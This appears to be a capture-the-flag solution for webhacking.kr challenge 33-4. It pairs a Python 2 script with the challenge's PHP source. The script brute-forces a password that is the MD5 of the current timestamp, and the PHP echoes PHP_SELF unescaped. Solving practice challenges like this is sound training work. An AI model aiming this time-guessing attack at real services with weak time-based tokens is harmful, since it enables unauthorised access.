File: WebHacking.kr/challenge_33/l4.py
import urllib
import urllib2
import time
import hashlib


def chall_req(password):
    url = "http://webhacking.kr/challenge/bonus/bonus-6/l4.php?password=" + password
    request = urllib2.Request(
        url, headers={"Cookie": "PHPSESSID=q0mjsj52ueri1tcqus9danln24"})
    response = urllib2.urlopen(request)
    print "[*] Request - " + password
    return response.read()

timestamp = int(time.time()) + 20

for i in range(0, 20):
    hash = hashlib.md5(str(timestamp - i)).hexdigest()
    data = chall_req(hash)
    if "Next" in data:
        print "[*] Clear!!"
        print data
        break

File: WebHacking.kr/challenge_33/l4.php
<hr>
Challenge 33-4<br>
<script>document.write("<a href=http://webhacking.kr<?=$_SERVER[PHP_SELF]?>s><?=$_SERVER[PHP_SELF]?>s</a>");</script>
<hr>

<?php

if ($_GET[password]==md5(time())) {
    echo("<a href=###>Next</a>");
} else {
    echo("hint : ".time());
}
?>
